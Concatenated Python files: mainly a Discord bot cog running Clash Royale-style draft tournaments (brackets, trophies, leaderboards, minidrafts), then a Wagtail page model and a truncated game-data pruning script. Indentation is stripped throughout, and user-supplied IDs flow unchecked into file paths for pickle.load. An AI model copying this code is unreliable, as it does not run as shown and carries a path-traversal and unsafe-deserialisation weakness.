with open("data/drafting/drafts/"+draftid+".p", "rb") as f:
draftobj = pickle.load(f)
draftobj.results = results
draftobj.status = "running"
with open("data/drafting/drafts/"+draftid+".p", "wb") as f:
pickle.dump(draftobj, f)
await self.bot.say("The Bracket has been completed")
print("## The bracket of "+draftobj.name+" has been finished")
break
elif r.reaction.emoji == "📝":
emb = discord.Embed(**msg.embeds[0])
_round = int(emb.title[-1])
for f in msg.embeds[0]["fields"]:
emb.add_field(name=f["name"], value=f["value"])
while True:
emb.description = "Use the respective number of a match to enter the result for it. Use the back button to finish editing"
emb.color = discord.Colour.blue()
await self.bot.edit_message(msg, embed=emb)
await self.bot.clear_reactions(msg)
emojis = ["◀"]
await self.bot.add_reaction(msg, "◀")
for m in range(len(emb.fields)):
emoji = str(m+1)+"\u20e3"
emojis.append(emoji)
await self.bot.add_reaction(msg, emoji)
s = await self.bot.wait_for_reaction(message=msg, check=checkEmoji)
if s.reaction.emoji == "◀":
break
else:
match = numbers[s.reaction.emoji]
while True:
emb.description = "Use the numbers to select the winner of *match "+str(match)+"*"
await self.bot.edit_message(msg, embed=emb)
emojis = ["◀", "1\u20e3", "2\u20e3"]
await self.bot.clear_reactions(msg)
await self.bot.add_reaction(msg, "◀")
await self.bot.add_reaction(msg, "1\u20e3")
await self.bot.add_reaction(msg, "2\u20e3")
t = await self.bot.wait_for_reaction(message=msg, check=checkEmoji)
if t.reaction.emoji == "◀":
break
else:
winner = numbers[t.reaction.emoji]
p1 = bracket[_round-1][match-1][0].display_name
p2 = bracket[_round-1][match-1][1].display_name
if "None" in [p1, p2]:
await self.bot.add_reaction(msg, "😂")
await self.bot.add_reaction(msg, "⛔")
await asyncio.sleep(0.5)
break
v = emb.fields[match-1].value.replace("*","")
if not v.startswith("("):
if winner == 1:
results[p1] = [results[p1][0]+1, results[p1][1]]
results[p2] = [results[p2][0], results[p2][1]+1]
pr1 = "*(W)"+p1+"*"
pr2 = "(L)"+p2
else:
results[p1] = [results[p1][0], results[p1][1]+1]
results[p2] = [results[p2][0]+1, results[p2][1]]
pr1 = "(L)"+p1
pr2 = "*(W)"+p2+"*"
else:
if winner == 1:
if not v.startswith("(W)"):
results[p1] = [results[p1][0]+1, results[p1][1]-1]
results[p2] = [results[p2][0]-1, results[p2][1]+1]
pr1 = "*(W)"+p1+"*"
pr2 = "(L)"+p2
else:
if not v.startswith("(L)"):
results[p1] = [results[p1][0]-1, results[p1][1]+1]
results[p2] = [results[p2][0]+1, results[p2][1]-1]
pr1 = "(L)"+p1
pr2 = "*(W)"+p2+"*"
emb.set_field_at(match-1, name="Match "+str(match) ,value="**"+pr1+"**\n vs\n**"+pr2+"**")
for f in range(len(resEmb.fields)):
if resEmb.fields[f].name == p1:
resEmb.set_field_at(f, name=p1, value=str(results[p1][0])+"/"+str(results[p1][1]), inline=False)
elif resEmb.fields[f].name == p2:
resEmb.set_field_at(f, name=p2, value=str(results[p2][0])+"/"+str(results[p2][1]), inline=False)
await self.bot.edit_message(res, embed=resEmb)
if complete == False:
c = 0
for key in results:
if results[key][0]+results[key][1] == draftobj.size-1:
c += 1
if c == draftobj.size:
complete = True
await self.bot.remove_reaction(res, "☑", self.bot.user)
await self.bot.add_reaction(res, "✅")
break
emb.color = discord.Colour.default()
emb.description = "Use the notepad to enter the results of this round"
await self.bot.edit_message(msg, embed=emb)
await self.bot.clear_reactions(s.reaction.message)
await self.bot.add_reaction(msg, "📝")
@commands.command(pass_context=True)
async def canceldraft(self, ctx, *, draftid=""):
"""cancels a running draft
(this command is not used to cancel a draft that is still in the process of making. Use the octagonal sign or the cross instead)
You need to either enter a valid ID of the draft that should get canceled or use this command in the drafts channel
"""
if draftid == "":
draftid = ctx.message.channel.topic
try:
with open("data/drafting/drafts/"+draftid+".p", "rb") as f:
draftobj = pickle.load(f)
except:
await self.bot.say("You need to either enter a valid ID of the draft that should get canceled or use this command in the drafts channel", delete_after=autodeletetime)
return
if draftobj.status == "finished":
await self.bot.say("This Draft is finished")
return
if draftobj.status == "canceled":
await self.bot.say("This Draft has already been canceled")
return
modRole = discord.utils.get(ctx.message.server.roles, name="Admin")
marshalRole = discord.utils.get(ctx.message.server.roles, name="Marshal")
if ctx.message.author.id == draftobj.host or modRole in ctx.message.author.roles or marshalRole in ctx.message.author.roles:
playerRole = discord.utils.get(ctx.message.server.roles, id=draftobj.playerRole)
await self.bot.delete_role(ctx.message.server, playerRole)
lobby = discord.utils.get(ctx.message.server.channels, name="monthly_mayhem")
await self.bot.send_message(lobby, ctx.message.author.mention +" canceled the draft '"+draftobj.name+"'("+draftid+")")
draftobj.status = "canceled"
with open("data/drafting/drafts/"+draftid+".p", "wb") as f:
pickle.dump(draftobj, f)
print("## The draft '"+draftobj.name+"' has been canceled")
channel = ctx.message.server.get_channel(draftobj.channel)
await self.bot.delete_channel(channel)
else:
await self.bot.say("Only the host of the draft is allowed to cancel the draft", delete_after=autodeletetime)
@commands.command(pass_context=True)
async def finishdraft(self, ctx, draftid="", draftpage=""):
"""finishes a running draft and processes the results
(this command is not used to cancel a draft that is still in the process of making. Use the octagonal sign or the cross instead)
'draftid' (You need to enter the id of the running draft that is supposed to be finished.)
'draftpage' (Please enter the clashvariant.com link of your draft if you drafted there)
If you entered the results through the in-discord bracket system you need to be a Marshal or Mod for the results to be processed and trophies adjusted.
You need to either enter a valid ID of the draft that should get finished or use this command in the drafts channel
"""
if draftid == "":
draftid = ctx.message.channel.topic
try:
with open("data/drafting/drafts/"+draftid+".p", "rb") as f:
draftobj = pickle.load(f)
except:
await self.bot.say("You need to either enter a valid ID of the draft that should get finished or use this command in the drafts channel", delete_after=autodeletetime)
return
if draftobj.status == "finished":
await self.bot.say("This Draft is already finished")
return
if draftobj.status == "canceled":
await self.bot.say("This Draft has been canceled")
return
if draftobj.status == "bracket":
await self.bot.say("There is still a bracket running in this draft. Please complete or cancel it first")
return
modRole = discord.utils.get(ctx.message.server.roles, name="Admin")
marshalRole = discord.utils.get(ctx.message.server.roles, name="Marshal")
if ctx.message.author.id == draftobj.host or modRole in ctx.message.author.roles or marshalRole in ctx.message.author.roles:
playerRole = discord.utils.get(ctx.message.server.roles, id=draftobj.playerRole)
await self.bot.delete_role(ctx.message.server, playerRole)
draftobj.status = "finished"
draftobj.draftpage = draftpage
with open("data/drafting/drafts/"+draftid+".p", "wb") as f:
pickle.dump(draftobj, f)
for plr in draftobj.players:
try:
with open("data/drafting/playerData/"+plr+".p", "rb") as p:
plyr = pickle.load(p)
if draftobj.host == plr:
plyr.hosted += 1
usr = ctx.message.server.get_member(plr)
plyr.draft_amount += 1
roles = await updateDrafterRole(ctx.message.server, plyr)
await self.bot.replace_roles(usr, *roles)
plyr.drafts.append(draftobj.id)
if modRole in ctx.message.author.roles or marshalRole in ctx.message.author.roles:
WL = draftobj.results[usr.display_name]
if plyr.trophies + int(WL[0])-int(WL[1]) >= 0:
plyr.trophies += int(WL[0])-int(WL[1])
else:
plyr.trophies = 0
plyr.setArena()
await manageLeaderboard(ctx.message.server, plyr)
with open("data/drafting/playerData/"+plr+".p", "wb") as p:
pickle.dump(plyr, p)
except:
print("## Error in Finishdraft at "+plr)
with open("data/drafting/draftlist.p", "rb") as dl:
l = pickle.load(dl)
l.append([draftobj.name, draftobj.id, draftobj.date])
with open("data/drafting/draftlist.p", "wb") as dl:
pickle.dump(l, dl)
lobby = discord.utils.get(ctx.message.server.channels, name="monthly_mayhem")
await self.bot.send_message(lobby, ctx.message.author.mention +" finished the draft '"+draftobj.name+"'("+draftid+")")
print("## The draft '"+draftobj.name+"' has been finished")
channel = ctx.message.server.get_channel(draftobj.channel)
await self.bot.delete_channel(channel)
else:
await self.bot.say("Only the host of the draft is allowed to finish the draft", delete_after=autodeletetime)
@commands.command(pass_context=True, hidden=True)
async def seasonreset(self, ctx):
modRole = discord.utils.get(ctx.message.server.roles, name="Admin")
if not modRole in ctx.message.author.roles:
await self.bot.say("You are not allowed to use this command!", delete_after=autodeletetime)
return
await self.bot.say("Do you really want to iniate the seasonreset? Type 'yes'")
y = await self.bot.wait_for_message(timeout=11, author=ctx.message.author, content="yes")
if y == None:
await self.bot.say("Seasonreset failed")
return
await self.bot.add_reaction(y, "👍")
await self.bot.say("Iniated Seasonreset")
for file in os.listdir("data/drafting/playerData/"):
with open("data/drafting/playerData/"+file, "rb") as f:
plyr = pickle.load(f)
plyr.trophyreset()
plyr.setArena()
plyr.updateDraftAmount()
await manageLeaderboard(ctx.message.server, plyr)
roles = await updateDrafterRole(ctx.message.server, plyr)
user = ctx.message.server.get_member(plyr.id)
if user == None:
print("## "+plyr.name+" does no longer exists, deleting his file...")
os.remove("data/drafting/playerData/"+plyr.id+".p")
else:
await self.bot.replace_roles(user, *roles)
with open("data/drafting/playerData/"+file, "wb") as f:
pickle.dump(plyr, f)
await self.bot.say("Succesfully finished seasonreset")
print("## Succesfully finished seasonreset")
@commands.command(pass_context=True)
async def register(self, ctx):
"""registeres you in our database so you can use the draft system"""
plyr = Player(user=ctx.message.author)
if Path("data/drafting/playerData/"+ctx.message.author.id+".p").is_file() == False:
with open("data/drafting/playerData/"+ctx.message.author.id+".p", "wb") as f:
pickle.dump(plyr, f)
await self.bot.say("Succesfully registered "+ ctx.message.author.mention, delete_after=autodeletetime)
print("## "+ctx.message.author.name+" succesfully registered")
else:
await self.bot.say(ctx.message.author.mention+", you are already registered", delete_after=autodeletetime)
@commands.command(pass_context=True)
async def unregister(self,ctx):
"""deletes your entry in our database and all data within"""
if Path("data/drafting/playerData/"+ctx.message.author.id+".p").is_file():
os.remove("data/drafting/playerData/"+ctx.message.author.id+".p")
await self.bot.say(ctx.message.author.mention+" successfully unregistered and deleted all data stored", delete_after=autodeletetime)
print("## "+ctx.message.author.name+" succesfully unregistered")
else:
await self.bot.say(ctx.message.author.mention+" you are not registered", delete_after=autodeletetime)
@commands.command(pass_context=True)
async def draftprofile(self, ctx, playername=None):
"""shows the profile of the selected player(either use name or tag)
if no name is entered it will show your own profile
Drafttrophies can be gained through playing official drafts hosted by Marshals.
Your gain/loss gets calculated through your wins minus losses(can get negative values, eg. you loose trophies)
Your arena is dependend on your trophies. Every 5 trophies you unlock a new one. You can also drop our of arenas!
Drafts are the total count of your completed drafts.
"""
if playername == None:
playername = ctx.message.author.display_name
if len(ctx.message.mentions) > 0:
playername = ctx.message.mentions[0].display_name
try:
player = discord.utils.get(ctx.message.server.members, display_name=playername)
except:
player = ""
if Path("data/drafting/playerData/"+player.id+".p").is_file():
with open("data/drafting/playerData/"+player.id+".p", "rb") as f:
plyr = pickle.load(f)
plyr.rank = await getRank(player)
emb = discord.Embed(title="Profile", description="Player: "+player.display_name, color=0x3498db)
emb.set_thumbnail(url=player.avatar_url)
emb.add_field(name="Drafttrophies", value=plyr.trophies)
emb.add_field(name="Legendtrophies", value=plyr.legendtrophies)
emb.add_field(name="Arena", value=plyr.arena)
emb.add_field(name="Rank", value=plyr.rank)
emb.add_field(name="Drafts", value=plyr.draft_amount)
emb.add_field(name="Last Seasons Drafts", value=plyr.old_draft_amount)
await self.bot.say(embed=emb)
print("## showed profile of "+player.display_name)
else:
await self.bot.say("Playername is either wrong or the player is not registered", delete_after=autodeletetime)
@commands.command(pass_context=True)
async def draftme(self, ctx):
"""gives yourself the 'Drafter' role used to notify you of drafts happening"""
if ctx.message.server == None:
await self.bot.say("You can only use this command on a server")
return
drafter = discord.utils.get(ctx.message.server.roles, name="MM participant")
if drafter in ctx.message.author.roles:
await self.bot.say(ctx.message.author.mention +", you already have this role", delete_after=autodeletetime)
else:
await self.bot.add_roles(ctx.message.author, drafter)
await self.bot.say('Given the role "Drafter" to '+ ctx.message.author.mention, delete_after=autodeletetime)
print("## Gave role 'Drafter' to "+ ctx.message.author.display_name)
@commands.command(pass_context=True)
async def undraftme(self, ctx):
"""removes the role 'Drafter' from you"""
if ctx.message.server == None:
await self.bot.say("You can only use this command on a server")
return
drafter = discord.utils.get(ctx.message.server.roles, name="MM participant")
if drafter in ctx.message.author.roles:
await self.bot.remove_roles(ctx.message.author, drafter)
await self.bot.say('Removed the role "Drafter" from '+ ctx.message.author.mention, delete_after=autodeletetime)
print("## Removed the role 'Drafter' from "+ ctx.message.author.display_name)
else:
await self.bot.say(ctx.message.author.mention +", you dont have this role", delete_after=autodeletetime)
@commands.command(pass_context=True)
async def template(self, ctx):
"""a google docs template for entering the records of your draft
create yourself a copy of this and you should be good to go
"""
await self.bot.say("https://docs.google.com/spreadsheets/d/1GKg2YtHehQrDEKqJ1obSECk0Drh_D1Scznh8Feuw1IE/edit?usp=sharing")
print("## Sent link to template")
@commands.command(pass_context=True)
async def showdraft(self, ctx, draftid=""):
"""Shows the informations of a draft"""
if Path("drafts/"+draftid+".p").is_file():
with open("drafts/"+draftid+".p", "rb") as f:
draftobj = pickle.load(f)
emb = discord.Embed(title="Draft information", description="Draft ID: "+draftid, color=0x3498db)
emb.set_thumbnail(url=ctx.message.server.icon_url)
emb.add_field(name="Name", value=draftobj.name)
emb.add_field(name="Size", value=str(draftobj.size))
emb.add_field(name="Date", value=draftobj.date)
host = ctx.message.server.get_member(draftobj.host)
if host != None:
emb.add_field(name="Host", value=host.mention)
else:
emb.add_field(name="Host", value="Unknown")
if draftobj.draftpage != "":
emb.add_field(name="Draftpage", value=draftobj.draftpage)
emb.add_field(name="Status", value=draftobj.status)
eligibleRole = discord.utils.get(ctx.message.server.roles, id=draftobj.eligible)
if eligibleRole != None:
emb.add_field(name="Eligible", value=eligibleRole.name)
else:
emb.add_field(name="Eligible", value="Unknown")
if draftobj.results == None:
emb.add_field(name="Results", value="Nothing entered yet")
else:
results = "*__Player__ __W/L__*\n"
for key in draftobj.results:
name = key
if name.startswith("_"):
name = name[1:]
results = results + name +"\n "+ str(draftobj.results[key][0]) +"/"+ str(draftobj.results[key][1])+"\n"
emb.add_field(name="Results", value=results, inline=False)
await self.bot.say(embed=emb)
if draftobj.decks != None:
deckEmb = discord.Embed(title="Decks", description="Decks of '"+draftobj.name+"'", color=0x3498db)
for d in draftobj.decks:
deckEmb.add_field(name=d["name"], value=d["value"], inline=False)
await self.bot.say(embed=deckEmb)
print("## showed draftinfos of "+ draftid)
else:
await self.bot.say("That draft does not exists", delete_after=autodeletetime)
@commands.command(pass_context=True)
async def draftlist(self, ctx):
"""shows a list of the most recent drafts"""
if not Path("data/drafting/draftlist.p").is_file():
with open("data/drafting/draftlist.p", "wb") as f:
l = [["listbeginning", "nothing to see here", "nope nothin"]]
pickle.dump(l, f)
with open("data/drafting/draftlist.p", "rb") as f:
l = pickle.load(f)
emb = discord.Embed(title="Draft list", description="The 10 most recent drafts", color=0x3498db)
emb.set_thumbnail(url=ctx.message.server.icon_url)
emb.set_footer(text="Use !showdraft <id> for more information on a single draft")
if len(l) >= 10:
r = 10
else:
r = len(l)
for n in range(r, 1, -1):
emb.add_field(name=str(r-n+1)+"- "+l[n-1][0]+" | "+l[n-1][2], value="ID: "+l[n-1][1], inline=False)
await self.bot.say(embed=emb)
print("## showed draftlist")
@commands.command(pass_context=True)
async def draftleaderboard(self, ctx):
"""shows the top of all drafters"""
if not Path("data/drafting/leaderboard.p").is_file():
with open("data/drafting/leaderboard.p", "wb") as f:
l = [["listbeginning", 0]]
pickle.dump(l, f)
with open("data/drafting/leaderboard.p", "rb") as f:
l = pickle.load(f)
emb = discord.Embed(title="Leaderboard", description="The top drafters", color=0x3498db)
emb.set_thumbnail(url=ctx.message.server.icon_url)
if len(l) >= 11:
r = 11
else:
r = len(l)
for n in range(r-1):
emb.add_field(name=str(n+1)+"- "+l[n][0], value=" "+str(l[n][1])+" trophies", inline=False)
await self.bot.say(embed=emb)
print("## showed leaderboard")
async def drafting(self, player1, player2, noleg):
p1deckhalf1 = "-"
p1deckhalf2 = "-"
p2deckhalf1 = "-"
p2deckhalf2 = "-"
cardemb1 = discord.Embed(title="Card 1", color=discord.Colour.red())
cardemb2 = discord.Embed(title="Card 2", color=discord.Colour.blue())
p1card1 = await self.bot.send_message(player1, embed=cardemb1)
p1card2 = await self.bot.send_message(player1, embed=cardemb2)
p2card1 = await self.bot.send_message(player2, embed=cardemb1)
p2card2 = await self.bot.send_message(player2, embed=cardemb2)
pemb1 = discord.Embed(title="Minidraft vs "+player2.display_name, description="Wait for your turn", color=discord.Colour.green())
pemb1.set_thumbnail(url=player2.avatar_url)
pemb1.add_field(name="Round", value="1/4", inline=False)
pemb1.add_field(name="Your deck", value=p1deckhalf1, inline=False)
pemb1.add_field(name="Opponents deck", value=p2deckhalf2, inline=False)
pemb1.add_field(name="Card 1", value="-")
pemb1.add_field(name="Card 2", value="-")
msg1 = await self.bot.send_message(player1, embed=pemb1)
pemb2 = discord.Embed(title="Minidraft vs "+player1.display_name, description="Wait for your turn", color=discord.Colour.green())
pemb2.set_thumbnail(url=player1.avatar_url)
pemb2.add_field(name="Round", value="1/4", inline=False)
pemb2.add_field(name="Your deck", value=p2deckhalf1, inline=False)
pemb2.add_field(name="Opponents deck", value=p1deckhalf2, inline=False)
pemb2.add_field(name="Card 1", value="-")
pemb2.add_field(name="Card 2", value="-")
msg2 = await self.bot.send_message(player2, embed=pemb2)
def check(reaction, user):
if user != self.bot.user:
if reaction.emoji == "🔴" or reaction.emoji == "🔵":
return True
return False
cardpool = []
while len(cardpool) < 16:
i = randint(0,len(self.cards)-1)
if not self.cards[i] in cardpool:
if noleg == True:
if self.cards[i]["rarity"] == "Legendary":
continue
cardpool.append(self.cards[i])
pool1 = []
for i in range(0, 7, 2):
pair = []
pair.append(cardpool[i])
pair.append(cardpool[i+1])
pool1.append(pair)
pool2 = []
for i in range(8, 15, 2):
pair = []
pair.append(cardpool[i])
pair.append(cardpool[i+1])
pool2.append(pair)
p1deckhalf1 = ""
p1deckhalf2 = ""
p2deckhalf1 = ""
p2deckhalf2 = ""
for r in range(4):
#player 1
pemb2.description = "Opponents turn"
pemb2.set_field_at(0, name="Round", value=str(r+1)+"/4", inline=False)
await self.bot.edit_message(msg2, embed=pemb2)
cardemb1.set_image(url="http://www.clashapi.xyz/images/cards/"+pool1[r][0]['idName']+".png")
cardemb2.set_image(url="http://www.clashapi.xyz/images/cards/"+pool1[r][1]['idName']+".png")
pemb1.description = "Pick a Card (10 seconds time)"
pemb1.set_field_at(0, name="Round", value=str(r+1)+"/4", inline=False)
pemb1.set_field_at(3, name="Card 1", value=pool1[r][0]['name'])
pemb1.set_field_at(4, name="Card 2", value=pool1[r][1]['name'])
await self.bot.edit_message(p1card1, embed=cardemb1)
await self.bot.edit_message(p1card2, embed=cardemb2)
await self.bot.edit_message(msg1, embed=pemb1)
await self.bot.add_reaction(msg1, "🔴") # red
await self.bot.add_reaction(msg1, "🔵") # blue
react = await self.bot.wait_for_reaction(message=msg1, timeout=10, check=check)
if react == None:
c = randint(1,2)
if c == 1:
p1deckhalf1 = p1deckhalf1 + pool1[r][0]['name'] + ", "
p2deckhalf2 = p2deckhalf2 + pool1[r][1]['name'] + ", "
else:
p1deckhalf1 = p1deckhalf1 + pool1[r][1]['name'] + ", "
p2deckhalf2 = p2deckhalf2 + pool1[r][0]['name'] + ", "
elif react.reaction.emoji == "🔴": # red
p1deckhalf1 = p1deckhalf1 + pool1[r][0]['name'] + ", "
p2deckhalf2 = p2deckhalf2 + pool1[r][1]['name'] + ", "
elif react.reaction.emoji == "🔵": # blue
p1deckhalf1 = p1deckhalf1 + pool1[r][1]['name'] + ", "
p2deckhalf2 = p2deckhalf2 + pool1[r][0]['name'] + ", "
pemb1.description = "Opponents turn"
pemb1.set_field_at(1, name="Your deck", value=p1deckhalf1, inline=False)
pemb1.set_field_at(2, name="Opponents deck", value=p2deckhalf2, inline=False)
pemb1.set_field_at(3, name="Card 1", value="-")
pemb1.set_field_at(4, name="Card 2", value="-")
await self.bot.delete_message(msg1)
msg1 = await self.bot.send_message(player1, embed=pemb1)
cardemb1.set_image(url="")
cardemb2.set_image(url="")
await self.bot.edit_message(p1card1, embed=cardemb1)
await self.bot.edit_message(p1card2, embed=cardemb2)
#player 2
cardemb1.set_image(url="http://www.clashapi.xyz/images/cards/"+pool2[r][0]['idName']+".png")
cardemb2.set_image(url="http://www.clashapi.xyz/images/cards/"+pool2[r][1]['idName']+".png")
pemb2.description = "Pick a Card (10 seconds time)"
pemb2.set_field_at(3, name="Card 1", value=pool2[r][0]['name'])
pemb2.set_field_at(4, name="Card 2", value=pool2[r][1]['name'])
await self.bot.edit_message(p2card1, embed=cardemb1)
await self.bot.edit_message(p2card2, embed=cardemb2)
await self.bot.edit_message(msg2, embed=pemb2)
await self.bot.add_reaction(msg2, "🔴") # red
await self.bot.add_reaction(msg2, "🔵") # blue
react = await self.bot.wait_for_reaction(message=msg2, timeout=10, check=check)
if react == None:
c = randint(1,2)
if c == 1:
p2deckhalf1 = p2deckhalf1 + pool2[r][1]['name'] + ", "
p1deckhalf2 = p1deckhalf2 + pool2[r][0]['name'] + ", "
else:
p2deckhalf1 = p2deckhalf1 + pool2[r][1]['name'] + ", "
p1deckhalf2 = p1deckhalf2 + pool2[r][0]['name'] + ", "
elif react.reaction.emoji == "🔴": # red
p2deckhalf1 = p2deckhalf1 + pool2[r][0]['name'] + ", "
p1deckhalf2 = p1deckhalf2 + pool2[r][1]['name'] + ", "
elif react.reaction.emoji == "🔵": # blue
p2deckhalf1 = p2deckhalf1 + pool2[r][1]['name'] + ", "
p1deckhalf2 = p1deckhalf2 + pool2[r][0]['name'] + ", "
pemb2.set_field_at(1, name="Your deck", value=p2deckhalf1, inline=False)
pemb2.set_field_at(2, name="Opponents deck", value=p1deckhalf2, inline=False)
pemb2.set_field_at(3, name="Card 1", value="-")
pemb2.set_field_at(4, name="Card 2", value="-")
await self.bot.delete_message(msg2)
msg2 = await self.bot.send_message(player2, embed=pemb2)
cardemb1.set_image(url="")
cardemb2.set_image(url="")
await self.bot.edit_message(p2card1, embed=cardemb1)
await self.bot.edit_message(p2card2, embed=cardemb2)
pemb1.description = "Minidraft finished"
pemb2.description = "Minidraft finished"
await self.bot.edit_message(msg1, embed=pemb1)
await self.bot.edit_message(msg2, embed=pemb2)
await self.bot.send_message(player1, "Your final deck:\n"+"```"+p1deckhalf1+p1deckhalf2+"```")
await self.bot.send_message(player2, "Your final deck:\n"+"```"+p2deckhalf1+p2deckhalf2+"```")
@commands.group(pass_context=True)
async def minidraft(self, ctx, opponent:discord.Member):
"""creates a casual 1v1 minidraft
Minidrafts work the same way the ingame draftchallenge works.
You need to @mention the user you want to challenge. He will have 15 Minutes to accept the challenge before it will timeout.
The draft will be held over DMs with the bot
"""
challenger = ctx.message.author
if opponent == challenger:
await self.bot.say("You cant challenge yourself", delete_after=autodeletetime)
return
l = ""
if ctx.invoked_subcommand is None:
noleg = False
else:
noleg = True
l = "\nNo legendaries will be able to be drafted"
await self.bot.say(challenger.mention+" challenged "+opponent.mention+" for a minidraft"+l)
print("## "+challenger.display_name+" challenged "+opponent.display_name+" for a minidraft"+l)
chMsg = await self.bot.send_message(opponent, "You were challenged for a minidraft by "+challenger.display_name+". "+l+"\nDo you want to accept the challenge?")
await self.bot.add_reaction(chMsg, "❎")#no
await self.bot.add_reaction(chMsg, "✅")#yes
def check_isBot(reaction, user):
if user == self.bot.user:
return False
else:
return True
while True:
react = await self.bot.wait_for_reaction(message=chMsg, timeout=900, check=check_isBot)
if react == None:
await self.bot.remove_reaction(chMsg, "❎", self.bot.user)
await self.bot.remove_reaction(chMsg, "✅", self.bot.user)
await self.bot.edit_message(chMsg, new_content=chMsg.content+"\n*The challenge timed out*")
await self.bot.send_message(challenger, "Your challenge for "+opponent.display_name+" timed out")
print("## "+challenger.display_name+"'s challenge for "+opponent.display_name+" timed out")
return
if react.reaction.emoji == "❎": #no
await self.bot.remove_reaction(chMsg, "❎", self.bot.user)
await self.bot.remove_reaction(chMsg, "✅", self.bot.user)
await self.bot.edit_message(chMsg, new_content=chMsg.content+"\n*Challenge declined*")
await self.bot.send_message(challenger, opponent.display_name+" declined your challenge")
print("## "+challenger.display_name+"'s challenge for "+opponent.display_name+" got declined")
return
if react.reaction.emoji == "✅": # yes
await self.bot.remove_reaction(chMsg, "❎", self.bot.user)
await self.bot.remove_reaction(chMsg, "✅", self.bot.user)
await self.bot.edit_message(chMsg, new_content=chMsg.content+"\n*Challenge accepted*")
await self.bot.send_message(challenger, opponent.display_name+" accepted your challenge")
print("## "+challenger.display_name+"'s challenge for "+opponent.display_name+" got accepted")
break
for i in range(2):
if i == 0:
participant = challenger
else:
participant = opponent
rdyCheck = await self.bot.send_message(participant, "Are you ready to start?")
await self.bot.add_reaction(rdyCheck, "❎")#no
await self.bot.add_reaction(rdyCheck, "✅")#yes
rdy = await self.bot.wait_for_reaction(message=rdyCheck, timeout=180, check=check_isBot)
if rdy == None:
await self.bot.remove_reaction(rdyCheck, "❎", self.bot.user)
await self.bot.remove_reaction(rdyCheck, "✅", self.bot.user)
await self.bot.edit_message(rdyCheck, new_content=rdyCheck.content+"\n*Readycheck timed out*")
await self.bot.send_message(challenger, participant.display_name+"'s readychheck timed out")
await self.bot.send_message(opponent, participant.display_name+"'s readychheck timed out")
print("## "+participant.display_name+"'s readycheck timed out")
return
if rdy.reaction.emoji == "✅": #yes
await self.bot.remove_reaction(rdyCheck, "❎", self.bot.user)
await self.bot.remove_reaction(rdyCheck, "✅", self.bot.user)
await self.bot.edit_message(rdyCheck, new_content=rdyCheck.content+"\n*Readycheck cleared*")
await self.bot.send_message(challenger, participant.display_name+" cleared readycheck")
await self.bot.send_message(opponent, participant.display_name+" cleared readycheck")
print("## "+participant.display_name+" cleared readycheck")
else:
await self.bot.remove_reaction(rdyCheck, "❎", self.bot.user)
await self.bot.remove_reaction(rdyCheck, "✅", self.bot.user)
await self.bot.edit_message(rdyCheck, new_content=rdyCheck.content+"\n*Readycheck declined*")
await self.bot.send_message(challenger, participant.display_name+"'s readycheck declined")
await self.bot.send_message(opponent, participant.display_name+"'s readycheck declined")
print("## "+participant.display_name+"'s readycheck got declined")
return
await self.drafting(challenger, opponent, noleg)
def setup(bot):
bot.add_cog(Drafting(bot))
|
from wagtail.core import blocks
from wagtail.core.blocks import RichTextBlock
from wagtail.core.fields import StreamField
from wagtail.admin.edit_handlers import TabbedInterface, StreamFieldPanel, ObjectList
from falmer.content import components
from falmer.content.blocks import HeroImageBlock, FalmerImageChooserBlock
from falmer.content.models.core import Page
class GridItem(blocks.StructBlock):
title = blocks.CharBlock(required=True)
link = blocks.URLBlock()
image = FalmerImageChooserBlock()
description = RichTextBlock(required=False)
class Meta:
icon = 'item'
class SelectionGridPage(Page):
body = StreamField([
('heading_hero', HeroImageBlock()),
components.text.to_pair(),
('selection_grid', blocks.ListBlock(GridItem)),
])
content_panels = Page.content_panels + [
StreamFieldPanel('body'),
]
edit_handler = TabbedInterface([
ObjectList(content_panels, heading='Content'),
ObjectList(Page.promote_panels, heading='Promote'),
ObjectList(Page.settings_panels, heading='Settings', classname="settings"),
])
type_fields = (
'body',
)
|
import json
CHAR_LOC = "character_table.json"
ITEM_LOC = "item_table.json"
FORMULA_LOC = "building_data.json"
FTYPE='formulaType'
FCT = 'manufactFormulas'
CHIP = "F_ASC"
FCT_REMOVE = ('weight', 'costPoint', 'formulaType', 'buffType', 'requireRooms', 'requireStages')
WRK = 'workshopFormulas'
ELITE = "F_EVOLVE"
WRK_REMOVE = ('apCost', 'formulaType', 'buffType', 'extraOutcomeRate', 'extraOutcomeGroup', 'requireRooms', 'requireStages')
ITM = 'items'
ITM_REMOVE = ('description', 'iconId', 'overrideBkg', 'stackIconId', 'sortId', 'usage', 'obtainApproach',
'classifyType', 'itemType', 'stageDropList')
FMLINK = 'buildingProductList'
#ITM_VALS = list(range(3211, 3283)) + list(range(30011, 32001))
RARE = 'rarity'
CHAR_REMOVE = ('description', 'canUseGeneralPotentialItem', 'potentialItemId', 'team', 'displayNumber',
'tokenKey', 'appellation', 'position', 'tagList', 'displayLogo', 'itemUsage', 'itemDesc',
'itemObtainApproach', 'maxPotentialLevel', 'profession', 'trait', 'talents', 'potentialRanks',
'favorKeyFrames')
RM = "roomType"
CONVRM = {"MANUFACTURE":"manufactFormulas", "WORKSHOP":"workshopFormulas"}
FMID = "formulaId"
NM = 'name'
COST = 'costs'
def pruneFormulas():
try:
with open(FORMULA_LOC, "r") as fmfile:
fmdata = (json.loads(fmfile.read()))
except Exception:
return IOError("Failed to read file.")
[fmdata.pop(datadesc) for datadesc in list(fmdata.keys()) if datadesc not in [FCT, WRK]]
toRmv = []
for fnum in fmdata[FCT].keys():
if fmdata[FCT][fnum][FTYPE] == CHIP: # Keep formulas related to dualchip production (only in factories)
[fmdata[FCT][fnum].pop(datarow) for datarow in FCT_REMOVE]
else:
toRmv.append(fnum)
[fmdata[FCT].pop(fct_fnum) for fct_fnum in toRmv]
toRmv = []
for fnum in fmdata[WRK].keys():
if fmdata[WRK][fnum][FTYPE] == ELITE:
[fmdata[WRK][fnum].pop(datarow) for datarow in WRK_REMOVE]
else:
toRmv.append(fnum)
[fmdata[WRK].pop(wrk_fnum) for wrk_fnum in toRmv]
return fmdata
def pruneItems():
try:
with open(ITEM_LOC, "r") as itemfile:
itemdata = (json.loads(itemfile.read()))
except Exception:
return IOError("Failed to read file.")
[itemdata.pop(datadesc) for datadesc in list(itemdata.keys()) if datadesc != ITM]
toRmv = []
for fnum in itemdata[ITM].keys():
if fnum.isdigit() and \
((int(fnum) >= 3211 and int(fnum) <= 3303) or (int(fnum) >= 30011 and int(fnum) <= 32001)):
[itemdata[ITM][fnum].pop(datarow) for datarow in ITM_REMOVE]
if (int(fnum) >= 3211 and int(fnum) <= 3303 and (int(fnum) % 10 != 3 or int(fnum) == 3303)):
itemdata[ITM][fnum][FMLINK] = []
else:
